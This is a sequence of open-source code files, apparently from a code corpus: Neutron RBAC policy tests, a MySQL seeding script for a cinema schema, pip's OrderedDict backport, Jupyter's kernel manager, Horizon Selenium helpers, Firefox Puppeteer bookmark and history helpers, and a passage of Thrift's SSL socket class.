p1, self.admin_client.show_rbac_policy(p1['id'])['rbac_policy'])
self.assertEqual(
p2, self.admin_client.show_rbac_policy(p2['id'])['rbac_policy'])
@test.attr(type='smoke')
@test.idempotent_id('e7bcb1ea-4877-4266-87bb-76f68b421f31')
def test_filter_policies(self):
net = self.create_network()
pol1 = self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared',
target_tenant=self.client2.tenant_id)['rbac_policy']
pol2 = self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared',
target_tenant=self.client.tenant_id)['rbac_policy']
res1 = self.client.list_rbac_policies(id=pol1['id'])['rbac_policies']
res2 = self.client.list_rbac_policies(id=pol2['id'])['rbac_policies']
self.assertEqual(1, len(res1))
self.assertEqual(1, len(res2))
self.assertEqual(pol1['id'], res1[0]['id'])
self.assertEqual(pol2['id'], res2[0]['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff6fff')
def test_regular_client_blocked_from_sharing_anothers_network(self):
net = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)['network']
with testtools.ExpectedException(lib_exc.BadRequest):
self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client.tenant_id)
@test.attr(type='smoke')
@test.idempotent_id('c5f8f785-ce8d-4430-af7e-a236205862fb')
def test_rbac_policy_quota(self):
if not test.is_extension_enabled('quotas', 'network'):
msg = "quotas extension not enabled."
raise self.skipException(msg)
quota = self.client.show_quotas(self.client.tenant_id)['quota']
max_policies = quota['rbac_policy']
self.assertGreater(max_policies, 0)
net = self.client.create_network(
name=data_utils.rand_name('test-network-'))['network']
self.addCleanup(self.client.delete_network, net['id'])
with testtools.ExpectedException(lib_exc.Conflict):
for i in range(0, max_policies + 1):
self.admin_client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared',
target_tenant=str(uuid.uuid4()).replace('-', ''))
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff7fff')
def test_regular_client_blocked_from_sharing_with_wildcard(self):
net = self.create_network()
with testtools.ExpectedException(lib_exc.Forbidden):
self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant='*')
# ensure it works on update as well
pol = self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client2.tenant_id)
with testtools.ExpectedException(lib_exc.Forbidden):
self.client.update_rbac_policy(pol['rbac_policy']['id'],
target_tenant='*')
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-aeeeeeee7fff')
def test_filtering_works_with_rbac_records_present(self):
resp = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)
net = resp['network']['id']
sub = resp['subnet']['id']
self.admin_client.create_rbac_policy(
object_type='network', object_id=net,
action='access_as_shared', target_tenant='*')
self._assert_shared_object_id_listing_presence('subnets', False, sub)
self._assert_shared_object_id_listing_presence('subnets', True, sub)
self._assert_shared_object_id_listing_presence('networks', False, net)
self._assert_shared_object_id_listing_presence('networks', True, net)
def _assert_shared_object_id_listing_presence(self, resource, shared, oid):
lister = getattr(self.admin_client, 'list_%s' % resource)
objects = [o['id'] for o in lister(shared=shared)[resource]]
if shared:
self.assertIn(oid, objects)
else:
self.assertNotIn(oid, objects)
| apache-2.0 |
piotrgiedziun/university | advanced_databases/lab2/populate.py | 1 | 2042 | #!/usr/bin/python
import MySQLdb
import random
from datetime import datetime as dt, timedelta
# MySQL format
DATE_FORMAT = '%Y-%m-%d %H:%M:%S'
db = MySQLdb.connect(host="localhost", user="root", passwd="", db="sakila")
cur = db.cursor()
print "connected"
# truncate old data
cur.execute("SET FOREIGN_KEY_CHECKS = 0;");
cur.execute("TRUNCATE `ticket`;");
cur.execute("TRUNCATE `seat`;");
cur.execute("TRUNCATE `show`;");
cur.execute("TRUNCATE `cinema`;");
cur.execute("TRUNCATE `theater`;");
cur.execute("SET FOREIGN_KEY_CHECKS = 1;");
print "cleaned"
# create cinema
cur.execute("INSERT INTO `cinema` (name, address) VALUES ('cinema', 'wroclaw');")
seat_id = 0
for theater_id in range(1, 1001):
#is_3D = random.randint(0,1)
is_3D = 1
query = "INSERT INTO `theater` (theater_id, name, is_3D, cinema_cinema_id) VALUES ('%d', 'theater%d', '%d', '1');" % (theater_id, theater_id, is_3D,)
#print query
cur.execute(query)
theater_real_id = db.insert_id()
# create seats for theater
for seat_col in range(0, 10):
for seat_row in range(0, 10):
price = random.randint(18,25)
query = "INSERT INTO `seat` (row, col, price, theater_theater_id) VALUES (%d, %d, %d, %d);" % (seat_row, seat_col, price, theater_real_id)
#print ">", query
cur.execute(query)
    # create one show per theater
now = dt.now() + timedelta(days=1)
for show_id in range(0, 1):
film_id = random.randint(1,999)
now += timedelta(minutes=185);
query = "INSERT INTO `show` (start_date, theater_theater_id, film_film_id) VALUES ('%s', %d, %d);" % (now.strftime(DATE_FORMAT), theater_real_id, film_id)
#print ">", query
cur.execute(query)
show_real_id = db.insert_id()
        # create tickets
for seat_col in range(0, 10):
for seat_row in range(0, 10):
price = random.randint(18,25)
                # advance to the matching seat id (seats were inserted in order)
seat_id += 1
query = "INSERT INTO `ticket` (price, seat_seat_id, show_show_id, cinema_cinema_id, theater_id) VALUES (%d, %d, %d, 1, %d);" % (price, seat_id, show_real_id, theater_real_id)
#print ">", query
cur.execute(query)
db.commit() | mit |
cdepman/falcon_api | site-packages/pip/compat/ordereddict.py | 141 | 4110 | # Copyright (c) 2009 Raymond Hettinger
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
# flake8: noqa
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.__map = {} # key --> [key, prev, next]
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
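# Usage sketch (added illustration; Python 2 semantics):
#   >>> d = OrderedDict([('b', 1), ('a', 2)])
#   >>> d.keys()
#   ['b', 'a']
#   >>> d.popitem()
#   ('a', 2)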
| mit |
lancezlin/ml_template_py | lib/python2.7/site-packages/jupyter_client/manager.py | 6 | 15569 | """Base class to manage a running kernel"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import absolute_import
from contextlib import contextmanager
import os
import re
import signal
import sys
import time
import warnings
try:
from queue import Empty # Py 3
except ImportError:
from Queue import Empty # Py 2
import zmq
from ipython_genutils.importstring import import_item
from .localinterfaces import is_local_ip, local_ips
from traitlets import (
Any, Instance, Unicode, List, Bool, Type, DottedObjectName
)
from jupyter_client import (
launch_kernel,
kernelspec,
)
from .connect import ConnectionFileMixin
from .session import Session
from .managerabc import (
KernelManagerABC
)
class KernelManager(ConnectionFileMixin):
"""Manages a single kernel in a subprocess on this host.
This version starts kernels with Popen.
"""
# The PyZMQ Context to use for communication with the kernel.
context = Instance(zmq.Context)
def _context_default(self):
return zmq.Context.instance()
# the class to create with our `client` method
client_class = DottedObjectName('jupyter_client.blocking.BlockingKernelClient')
client_factory = Type(klass='jupyter_client.KernelClient')
def _client_factory_default(self):
return import_item(self.client_class)
def _client_class_changed(self, name, old, new):
self.client_factory = import_item(str(new))
# The kernel process with which the KernelManager is communicating.
# generally a Popen instance
kernel = Any()
kernel_spec_manager = Instance(kernelspec.KernelSpecManager)
def _kernel_spec_manager_default(self):
return kernelspec.KernelSpecManager(data_dir=self.data_dir)
def _kernel_spec_manager_changed(self):
self._kernel_spec = None
kernel_name = Unicode(kernelspec.NATIVE_KERNEL_NAME)
def _kernel_name_changed(self, name, old, new):
self._kernel_spec = None
if new == 'python':
self.kernel_name = kernelspec.NATIVE_KERNEL_NAME
_kernel_spec = None
@property
def kernel_spec(self):
if self._kernel_spec is None:
self._kernel_spec = self.kernel_spec_manager.get_kernel_spec(self.kernel_name)
return self._kernel_spec
kernel_cmd = List(Unicode(), config=True,
help="""DEPRECATED: Use kernel_name instead.
The Popen Command to launch the kernel.
Override this if you have a custom kernel.
If kernel_cmd is specified in a configuration file,
Jupyter does not pass any arguments to the kernel,
because it cannot make any assumptions about the
arguments that the kernel understands. In particular,
this means that the kernel does not receive the
        option --debug if it is given on the Jupyter command line.
"""
)
def _kernel_cmd_changed(self, name, old, new):
warnings.warn("Setting kernel_cmd is deprecated, use kernel_spec to "
"start different kernels.")
@property
def ipykernel(self):
return self.kernel_name in {'python', 'python2', 'python3'}
# Protected traits
_launch_args = Any()
_control_socket = Any()
_restarter = Any()
autorestart = Bool(True, config=True,
help="""Should we autorestart the kernel if it dies."""
)
def __del__(self):
self._close_control_socket()
self.cleanup_connection_file()
#--------------------------------------------------------------------------
# Kernel restarter
#--------------------------------------------------------------------------
def start_restarter(self):
pass
def stop_restarter(self):
pass
def add_restart_callback(self, callback, event='restart'):
"""register a callback to be called when a kernel is restarted"""
if self._restarter is None:
return
self._restarter.add_callback(callback, event)
def remove_restart_callback(self, callback, event='restart'):
"""unregister a callback to be called when a kernel is restarted"""
if self._restarter is None:
return
self._restarter.remove_callback(callback, event)
#--------------------------------------------------------------------------
# create a Client connected to our Kernel
#--------------------------------------------------------------------------
def client(self, **kwargs):
"""Create a client configured to connect to our kernel"""
kw = {}
kw.update(self.get_connection_info(session=True))
kw.update(dict(
connection_file=self.connection_file,
parent=self,
))
# add kwargs last, for manual overrides
kw.update(kwargs)
return self.client_factory(**kw)
#--------------------------------------------------------------------------
# Kernel management
#--------------------------------------------------------------------------
def format_kernel_cmd(self, extra_arguments=None):
"""replace templated args (e.g. {connection_file})"""
extra_arguments = extra_arguments or []
if self.kernel_cmd:
cmd = self.kernel_cmd + extra_arguments
else:
cmd = self.kernel_spec.argv + extra_arguments
ns = dict(connection_file=self.connection_file,
prefix=sys.prefix,
)
ns.update(self._launch_args)
pat = re.compile(r'\{([A-Za-z0-9_]+)\}')
def from_ns(match):
"""Get the key out of ns if it's there, otherwise no change."""
return ns.get(match.group(1), match.group())
return [ pat.sub(from_ns, arg) for arg in cmd ]
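    # Substitution sketch (added note; values are hypothetical): a kernelspec
    # argv of ['python', '-m', 'ipykernel', '-f', '{connection_file}'] is
    # rendered as ['python', '-m', 'ipykernel', '-f', '/tmp/kernel-1234.json'].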
def _launch_kernel(self, kernel_cmd, **kw):
"""actually launch the kernel
override in a subclass to launch kernel subprocesses differently
"""
return launch_kernel(kernel_cmd, **kw)
# Control socket used for polite kernel shutdown
def _connect_control_socket(self):
if self._control_socket is None:
self._control_socket = self.connect_control()
self._control_socket.linger = 100
def _close_control_socket(self):
if self._control_socket is None:
return
self._control_socket.close()
self._control_socket = None
def start_kernel(self, **kw):
"""Starts a kernel on this host in a separate process.
If random ports (port=0) are being used, this method must be called
before the channels are created.
Parameters
----------
`**kw` : optional
keyword arguments that are passed down to build the kernel_cmd
and launching the kernel (e.g. Popen kwargs).
"""
if self.transport == 'tcp' and not is_local_ip(self.ip):
raise RuntimeError("Can only launch a kernel on a local interface. "
"Make sure that the '*_address' attributes are "
"configured properly. "
"Currently valid addresses are: %s" % local_ips()
)
# write connection file / get default ports
self.write_connection_file()
# save kwargs for use in restart
self._launch_args = kw.copy()
# build the Popen cmd
extra_arguments = kw.pop('extra_arguments', [])
kernel_cmd = self.format_kernel_cmd(extra_arguments=extra_arguments)
env = kw.pop('env', os.environ).copy()
# Don't allow PYTHONEXECUTABLE to be passed to kernel process.
# If set, it can bork all the things.
env.pop('PYTHONEXECUTABLE', None)
if not self.kernel_cmd:
# If kernel_cmd has been set manually, don't refer to a kernel spec
# Environment variables from kernel spec are added to os.environ
env.update(self.kernel_spec.env or {})
# launch the kernel subprocess
self.log.debug("Starting kernel: %s", kernel_cmd)
self.kernel = self._launch_kernel(kernel_cmd, env=env,
**kw)
self.start_restarter()
self._connect_control_socket()
def request_shutdown(self, restart=False):
"""Send a shutdown request via control channel
"""
content = dict(restart=restart)
msg = self.session.msg("shutdown_request", content=content)
self.session.send(self._control_socket, msg)
def finish_shutdown(self, waittime=1, pollinterval=0.1):
"""Wait for kernel shutdown, then kill process if it doesn't shutdown.
This does not send shutdown requests - use :meth:`request_shutdown`
first.
"""
for i in range(int(waittime/pollinterval)):
if self.is_alive():
time.sleep(pollinterval)
else:
break
else:
# OK, we've waited long enough.
if self.has_kernel:
self._kill_kernel()
def cleanup(self, connection_file=True):
"""Clean up resources when the kernel is shut down"""
if connection_file:
self.cleanup_connection_file()
self.cleanup_ipc_files()
self._close_control_socket()
def shutdown_kernel(self, now=False, restart=False):
"""Attempts to the stop the kernel process cleanly.
This attempts to shutdown the kernels cleanly by:
1. Sending it a shutdown message over the shell channel.
2. If that fails, the kernel is shutdown forcibly by sending it
a signal.
Parameters
----------
now : bool
            Should the kernel be forcibly killed *now*. This skips the
first, nice shutdown attempt.
restart: bool
Will this kernel be restarted after it is shutdown. When this
is True, connection files will not be cleaned up.
"""
# Stop monitoring for restarting while we shutdown.
self.stop_restarter()
if now:
self._kill_kernel()
else:
self.request_shutdown(restart=restart)
# Don't send any additional kernel kill messages immediately, to give
# the kernel a chance to properly execute shutdown actions. Wait for at
# most 1s, checking every 0.1s.
self.finish_shutdown()
self.cleanup(connection_file=not restart)
def restart_kernel(self, now=False, **kw):
"""Restarts a kernel with the arguments that were used to launch it.
If the old kernel was launched with random ports, the same ports will be
used for the new kernel. The same connection file is used again.
Parameters
----------
now : bool, optional
If True, the kernel is forcefully restarted *immediately*, without
having a chance to do any cleanup action. Otherwise the kernel is
given 1s to clean up before a forceful restart is issued.
In all cases the kernel is restarted, the only difference is whether
it is given a chance to perform a clean shutdown or not.
`**kw` : optional
Any options specified here will overwrite those used to launch the
kernel.
"""
if self._launch_args is None:
raise RuntimeError("Cannot restart the kernel. "
"No previous call to 'start_kernel'.")
else:
# Stop currently running kernel.
self.shutdown_kernel(now=now, restart=True)
# Start new kernel.
self._launch_args.update(kw)
self.start_kernel(**self._launch_args)
@property
def has_kernel(self):
"""Has a kernel been started that we are managing."""
return self.kernel is not None
def _kill_kernel(self):
"""Kill the running kernel.
This is a private method, callers should use shutdown_kernel(now=True).
"""
if self.has_kernel:
# Signal the kernel to terminate (sends SIGKILL on Unix and calls
# TerminateProcess() on Win32).
try:
self.kernel.kill()
except OSError as e:
# In Windows, we will get an Access Denied error if the process
# has already terminated. Ignore it.
if sys.platform == 'win32':
if e.winerror != 5:
raise
# On Unix, we may get an ESRCH error if the process has already
# terminated. Ignore it.
else:
from errno import ESRCH
if e.errno != ESRCH:
raise
# Block until the kernel terminates.
self.kernel.wait()
self.kernel = None
else:
raise RuntimeError("Cannot kill kernel. No kernel is running!")
def interrupt_kernel(self):
"""Interrupts the kernel by sending it a signal.
Unlike ``signal_kernel``, this operation is well supported on all
platforms.
"""
if self.has_kernel:
if sys.platform == 'win32':
from .win_interrupt import send_interrupt
send_interrupt(self.kernel.win32_interrupt_event)
else:
self.signal_kernel(signal.SIGINT)
else:
raise RuntimeError("Cannot interrupt kernel. No kernel is running!")
def signal_kernel(self, signum):
"""Sends a signal to the process group of the kernel (this
usually includes the kernel and any subprocesses spawned by
the kernel).
Note that since only SIGTERM is supported on Windows, this function is
only useful on Unix systems.
"""
if self.has_kernel:
if hasattr(os, "getpgid") and hasattr(os, "killpg"):
try:
pgid = os.getpgid(self.kernel.pid)
os.killpg(pgid, signum)
return
except OSError:
pass
self.kernel.send_signal(signum)
else:
raise RuntimeError("Cannot signal kernel. No kernel is running!")
def is_alive(self):
"""Is the kernel process still running?"""
        if self.has_kernel:
            # poll() returns None while the process is still running
            return self.kernel.poll() is None
        else:
            # we don't have a kernel
            return False
KernelManagerABC.register(KernelManager)
def start_new_kernel(startup_timeout=60, kernel_name='python', **kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
@contextmanager
def run_kernel(**kwargs):
"""Context manager to create a kernel in a subprocess.
The kernel is shut down when the context exits.
Returns
-------
kernel_client: connected KernelClient instance
"""
km, kc = start_new_kernel(**kwargs)
try:
yield kc
finally:
kc.stop_channels()
km.shutdown_kernel(now=True)
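# Usage sketch (not part of the original module; assumes it is importable as
# jupyter_client.manager and that a 'python' kernelspec is installed):
#
#     from jupyter_client.manager import run_kernel
#
#     with run_kernel(kernel_name='python') as kc:
#         msg_id = kc.execute('print("hello")')
#
# run_kernel() calls shutdown_kernel(now=True) on exit, so the caller does
# not need an explicit try/finally around the client.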
| mit |
rschnapka/odoo | addons/l10n_th/__init__.py | 893 | 1045 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
FNST-OpenStack/horizon | openstack_dashboard/test/integration_tests/basewebobject.py | 15 | 3946 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import selenium.common.exceptions as Exceptions
import selenium.webdriver.support.ui as Support
from selenium.webdriver.support import wait
import unittest
class BaseWebObject(unittest.TestCase):
"""Base class for all web objects."""
def __init__(self, driver, conf):
self.driver = driver
self.conf = conf
self.explicit_wait = self.conf.selenium.explicit_wait
def _is_element_present(self, *locator):
try:
self._turn_off_implicit_wait()
self._get_element(*locator)
return True
except Exceptions.NoSuchElementException:
return False
finally:
self._turn_on_implicit_wait()
def _is_element_visible(self, *locator):
try:
return self._get_element(*locator).is_displayed()
except (Exceptions.NoSuchElementException,
Exceptions.ElementNotVisibleException):
return False
def _is_element_displayed(self, element):
try:
return element.is_displayed()
except Exception:
return False
def _is_text_visible(self, element, text):
try:
return element.text == text
except Exception:
return False
def _get_element(self, *locator):
return self.driver.find_element(*locator)
def _get_elements(self, *locator):
return self.driver.find_elements(*locator)
def _fill_field_element(self, data, field_element):
field_element.clear()
field_element.send_keys(data)
return field_element
def _select_dropdown(self, value, element):
select = Support.Select(element)
select.select_by_visible_text(value)
def _select_dropdown_by_value(self, value, element):
select = Support.Select(element)
select.select_by_value(value)
def _turn_off_implicit_wait(self):
self.driver.implicitly_wait(0)
def _turn_on_implicit_wait(self):
self.driver.implicitly_wait(self.conf.selenium.page_timeout)
def _wait_until(self, predicate, timeout=None, poll_frequency=0.5):
"""Wait until the value returned by predicate is not False or
the timeout is elapsed.
'predicate' takes the driver as argument.
"""
if not timeout:
timeout = self.explicit_wait
wait.WebDriverWait(self.driver, timeout, poll_frequency).until(
predicate)
def _wait_till_text_present_in_element(self, element, text, timeout=None):
"""Waiting for a text to appear in a certain element very often is
actually waiting for a _different_ element with a different text to
appear in place of an old element. So a way to avoid capturing stale
element reference should be provided for this use case.
"""
def predicate(_):
elt = element() if hasattr(element, '__call__') else element
return self._is_text_visible(elt, text)
self._wait_until(predicate, timeout)
def _wait_till_element_visible(self, element, timeout=None):
self._wait_until(lambda x: self._is_element_displayed(element),
timeout)
def _wait_till_element_disappears(self, element, timeout=None):
self._wait_until(lambda x: not self._is_element_displayed(element),
timeout)
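# Illustrative subclass sketch (an assumption, not part of horizon itself;
# 'by' refers to selenium.webdriver.common.by):
#
#     class LoginForm(BaseWebObject):
#         _submit_locator = (by.By.CSS_SELECTOR, 'button[type="submit"]')
#
#         def submit(self):
#             self._get_element(*self._submit_locator).click()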
| apache-2.0 |
galgeek/firefox-ui-tests | firefox_puppeteer/api/places.py | 3 | 5870 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from collections import namedtuple
from marionette_driver.errors import MarionetteException, TimeoutException
from ..base import BaseLib
class Places(BaseLib):
"""Low-level access to several bookmark and history related actions."""
BookmarkFolders = namedtuple('bookmark_folders',
['root', 'menu', 'toolbar', 'tags', 'unfiled'])
bookmark_folders = BookmarkFolders(1, 2, 3, 4, 5)
# Bookmark related helpers #
def is_bookmarked(self, url):
"""Checks if the given URL is bookmarked.
:param url: The URL to Check
:returns: True, if the URL is a bookmark
"""
return self.marionette.execute_script("""
let url = arguments[0];
let bs = Cc["@mozilla.org/browser/nav-bookmarks-service;1"]
.getService(Ci.nsINavBookmarksService);
let ios = Cc["@mozilla.org/network/io-service;1"]
.getService(Ci.nsIIOService);
let uri = ios.newURI(url, null, null);
let results = bs.getBookmarkIdsForURI(uri, {});
return results.length == 1;
""", script_args=[url])
def get_folder_ids_for_url(self, url):
"""Retrieves the folder ids where the given URL has been bookmarked in.
:param url: URL of the bookmark
:returns: List of folder ids
"""
return self.marionette.execute_script("""
let url = arguments[0];
let bs = Cc["@mozilla.org/browser/nav-bookmarks-service;1"]
.getService(Ci.nsINavBookmarksService);
let ios = Cc["@mozilla.org/network/io-service;1"]
.getService(Ci.nsIIOService);
let bookmarkIds = bs.getBookmarkIdsForURI(ios.newURI(url, null, null), {});
let folderIds = [];
for (let i = 0; i < bookmarkIds.length; i++) {
folderIds.push(bs.getFolderIdForItem(bookmarkIds[i]));
}
return folderIds;
""", script_args=[url])
def is_bookmark_star_button_ready(self):
"""Checks if the status of the star-button is not updating.
:returns: True, if the button is ready
"""
return self.marionette.execute_script("""
let button = window.BookmarkingUI;
return button.status !== button.STATUS_UPDATING;
""")
def restore_default_bookmarks(self):
"""Restores the default bookmarks for the current profile."""
retVal = self.marionette.execute_async_script("""
Cu.import("resource://gre/modules/BookmarkHTMLUtils.jsm");
Cu.import("resource://gre/modules/Services.jsm");
// Default bookmarks.html file is stored inside omni.jar,
// so get it via a resource URI
let defaultBookmarks = 'resource:///defaults/profile/bookmarks.html';
let observer = {
observe: function (aSubject, aTopic, aData) {
Services.obs.removeObserver(observer, "bookmarks-restore-success");
Services.obs.removeObserver(observer, "bookmarks-restore-failed");
marionetteScriptFinished(aTopic == "bookmarks-restore-success");
}
};
// Trigger the import of the default bookmarks
Services.obs.addObserver(observer, "bookmarks-restore-success", false);
Services.obs.addObserver(observer, "bookmarks-restore-failed", false);
BookmarkHTMLUtils.importFromURL(defaultBookmarks, true);
""", script_timeout=10000)
if not retVal:
            raise MarionetteException("Restore Default Bookmarks failed")
# Browser history related helpers #
def remove_all_history(self):
"""Removes all history items."""
try:
self.marionette.execute_async_script("""
Cu.import("resource://gre/modules/Services.jsm");
let hs = Cc["@mozilla.org/browser/nav-history-service;1"]
.getService(Ci.nsIBrowserHistory);
let observer = {
observe: function (aSubject, aTopic, aData) {
Services.obs.removeObserver(observer, 'places-expiration-finished');
marionetteScriptFinished(true);
}
};
// Remove the pages, then block until we're done or until timeout is reached
Services.obs.addObserver(observer, 'places-expiration-finished', false);
hs.removeAllPages();
""", script_timeout=10000)
except TimeoutException:
# TODO: In case of a timeout clean-up the registered topic
pass
def wait_for_visited(self, urls, callback):
"""Waits until all passed-in urls have been visited.
:param urls: List of URLs which need to be visited and indexed
:param callback: Method to execute which triggers loading of the URLs
"""
# Bug 1121691: Needs observer handling support with callback first
# Until then we have to wait about 4s to ensure the page has been indexed
callback()
from time import sleep
sleep(4)
# Plugin related helpers #
def clear_plugin_data(self):
"""Clears any kind of locally stored data from plugins."""
self.marionette.execute_script("""
let host = Cc["@mozilla.org/plugin/host;1"].getService(Ci.nsIPluginHost);
let tags = host.getPluginTags();
tags.forEach(aTag => {
try {
host.clearSiteData(aTag, null, Ci.nsIPluginHost.FLAG_CLEAR_ALL, -1);
} catch (ex) {
}
});
""")
| mpl-2.0 |
lucafavatella/intellij-community | python/helpers/profiler/thrift/transport/TSSLSocket.py | 9 | 7756 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
import os
import socket
import ssl
from thrift.transport import TSocket
from thrift.transport.TTransport import TTransportException
class TSSLSocket(TSocket.TSocket):
"""
SSL implementation of client-side TSocket
This class creates outbound sockets wrapped using the
python standard ssl module for encrypted connections.
The protocol used is set using the class variable
SSL_VERSION, which must be one of ssl.PROTOCOL_* and
defaults to ssl.PROTOCOL_TLSv1 for greatest security.
"""
SSL_VERSION = ssl.PROTOCOL_TLSv1
def __init__(self,
host='localhost',
port=9090,
validate=True,
ca_certs=None,
keyfile=None,
certfile=None,
unix_socket=None):
"""Create SSL TSocket
@param validate: Set to False to disable SSL certificate validation
@type validate: bool
    @param ca_certs: Filename to the Certificate Authority pem file, possibly a
    file downloaded from: http://curl.haxx.se/ca/cacert.pem. This is passed to
    ssl.wrap_socket() as the 'ca_certs' parameter.
@type ca_certs: str
@param keyfile: The private key
@type keyfile: str
@param certfile: The cert file
@type certfile: str
Raises an IOError exception if validate is True and the ca_certs file is
None, not present or unreadable.
"""
self.validate = validate
self.is_valid = False
self.peercert = None
if not validate:
self.cert_reqs = ssl.CERT_NONE
else:
self.cert_reqs = ssl.CERT_REQUIRED
self.ca_certs = ca_certs
self.keyfile = keyfile
self.certfile = certfile
if validate:
if ca_certs is None or not os.access(ca_certs, os.R_OK):
raise IOError('Certificate Authority ca_certs file "%s" '
'is not readable, cannot validate SSL '
'certificates.' % (ca_certs))
TSocket.TSocket.__init__(self, host, port, unix_socket)
def open(self):
try:
res0 = self._resolveAddr()
for res in res0:
sock_family, sock_type = res[0:2]
ip_port = res[4]
plain_sock = socket.socket(sock_family, sock_type)
self.handle = ssl.wrap_socket(plain_sock,
ssl_version=self.SSL_VERSION,
do_handshake_on_connect=True,
ca_certs=self.ca_certs,
keyfile=self.keyfile,
certfile=self.certfile,
cert_reqs=self.cert_reqs)
self.handle.settimeout(self._timeout)
try:
self.handle.connect(ip_port)
except socket.error, e:
if res is not res0[-1]:
continue
else:
raise e
break
except socket.error, e:
if self._unix_socket:
message = 'Could not connect to secure socket %s: %s' \
% (self._unix_socket, e)
else:
